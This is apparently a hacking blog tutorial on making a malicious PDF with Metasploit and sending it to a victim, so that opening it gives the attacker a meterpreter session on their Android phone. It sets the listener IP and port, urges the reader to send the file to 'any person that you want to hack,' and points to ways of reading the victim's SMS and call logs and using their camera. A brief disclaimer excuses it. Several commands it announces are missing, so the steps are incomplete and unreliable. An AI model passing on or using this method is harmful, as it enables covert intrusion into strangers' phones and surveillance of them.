After receiving lot of praise and appreciation on our last post on Android to Android Hacking via Metasploit. We now gonna post a series of Hacking tools and techniques with working method and full description. This post is about Hacking android using Metasploit with PDF File. It works both on Android(via Termux) or any Desktop.
1. Termux app( Download it from Play Store).
2. Install Metasploit Framework in TermuX (Read Part #1 of this post to install Metasploit-Framework in just 4 simple steps).
3. TermuX should be allowed to use External Storage (For this enter the command : “termux-setup-storage”).
4. (Recommended not necessary) Use Hacker`s Keyboard for entering commands in TermuX easily.
Once you have completed all requirements we are ready to perform the hack.
Also Read :- Android to Android Hacking (100% working)
Hacking Android Using Metasploit via a PDF File :-
Step 1 :- Launch Metasploit Console
First of all open Termux, if you are on android or just open your terminal if on Desktop.
Enter the following command to open Metasploit Console
If this kind of screen appears in front of you then we are good and if not there might be problem in installation of metasploit.
Step 2 :- Creating the Evil PDF (Payload)
Type the commands given below or simply copy paste them one by one to create the PDF File.
Then you have to set your Localhost. For this you will need your IP Address, to check your IP Address type
in new seesion on termux or in another terminal window. Now come to your metasploit console and set your Localhost like this –
set LHOST 192.168.0.0
Replace the IP Address given in above command by your own IP Address
Now its time to setup port for this enter this command –
set LPORT 4444
You are free to use any port you want like 4564, 8080 etc.
Now its time to generate the Evil PDF File do this by below command –
set filename MyDocument.pdf
Here, you are also free to use any name you want just put it in place of MyDocument but be sure to put .pdf at the end of its name.
Now the last command is for final creation of file do this by typing this command –
Now within a second a message will be displayed saying that your PDF File is created at any default location. First copy that PDF File to your either Internal or External storage like this
mv <fille_location> <new_location>
And now you are done with creation part. Send it to any person that you want to hack. As soon as he/she will open that pdf file you will get the metasploit session.
Step 3 :- Exploitation
First open your metasploit console by typing
and then start writing below mentioned command –
set LHOST <your_IP>
set LPORT 4444
Note – Make sure to enter same IP and Port as you entered above in Step 2.
It will some time and then BOOM you will get meterpreter session. If such output appears then you got access to victim’s phone.
For seeing his/her sms, call logs, taking picture from victim’s camera you can use command given on the post about How to Hack an Android Phone with another Android (Without Root) : Android to Android Hacking(Part #2) in the last section.
Note – This is only for educational purpose and I’m not responsible for any misuse or harm done.
If you need any help then feel free to ask me in comment.
Thanks for coming if you like it then please share it, you will be appreciated.